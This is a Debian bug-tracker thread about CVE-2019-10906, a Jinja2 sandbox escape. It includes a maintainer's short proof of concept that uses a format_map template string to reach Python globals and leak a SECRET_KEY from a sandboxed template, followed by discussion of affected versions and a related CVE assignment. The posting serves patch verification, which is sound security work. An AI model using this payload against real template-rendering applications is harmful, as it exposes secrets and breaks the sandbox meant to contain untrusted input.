Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Hugo, On Mon, Apr 08, 2019 at 10:20:29PM +0200, Hugo Lefeuvre wrote: > Hi Salvatore, > > > CVE-2016-10745 was assigned for this issue. > > Thanks for the information. > > I just noticed you added CVE-2016-10745 to the tracker. I am fairly > confused, do you know why this CVE was not referenced in the tracker? > Or did you just request it? It was not referenced, because there was not CVE yet. I was irritated that for the later issue apparently a CVE Was assigned, but not for the original first issue, so I requested a CVE for it. It would have showed up on next CVE list update, bug given I got the confirmation from MITRE on the assignment I then already added it to the tracker. So in short, yes I did rquest the CVE and was assigned yesterday. Regards, Salvatore
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Salvatore, > CVE-2016-10745 was assigned for this issue. Thanks for the information. I just noticed you added CVE-2016-10745 to the tracker. I am fairly confused, do you know why this CVE was not referenced in the tracker? Or did you just request it? cheers, Hugo -- Hugo Lefeuvre (hle)|www.owl.eu.com RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C signature.asc Description: PGP signature
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Hugo, On Mon, Apr 08, 2019 at 10:04:35AM +0200, Hugo Lefeuvre wrote: > > This should help confirming vulnerability in other suites. > > 2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and > 2.8-1 are affected by the previous str.format issue[0]. > > [0] https://palletsprojects.com/blog/jinja-281-released/ CVE-2016-10745 was assigned for this issue. Regards, Salvtore
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
> This should help confirming vulnerability in other suites. 2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and 2.8-1 are affected by the previous str.format issue[0]. [0] https://palletsprojects.com/blog/jinja-281-released/ -- Hugo Lefeuvre (hle)|www.owl.eu.com RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C signature.asc Description: PGP signature
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi, I'm working on a potential jinja2 Debian LTS security update. Here is a proof of concept which allows to easily reproduce the issue. This should help confirming vulnerability in other suites. >>> from jinja2.sandbox import SandboxedEnvironment >>> env = SandboxedEnvironment() >>> config = {'SECRET_KEY': '12345'} >>> class User(object): ... def __init__(self, name): ... self.name = name ... >>> t = env.from_string('{{ >>> "{x.__class__.__init__.__globals__[config]}".format_map(dic) }}') >>> t.render(dic={"x": User('joe')}) "{'SECRET_KEY': '12345'}" Expected behaviour would be jinja2.exceptions.SecurityError. Adapted from[0]. regards, Hugo [0] https://palletsprojects.com/blog/jinja-281-released/ -- Hugo Lefeuvre (hle)|www.owl.eu.com RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C signature.asc Description: PGP signature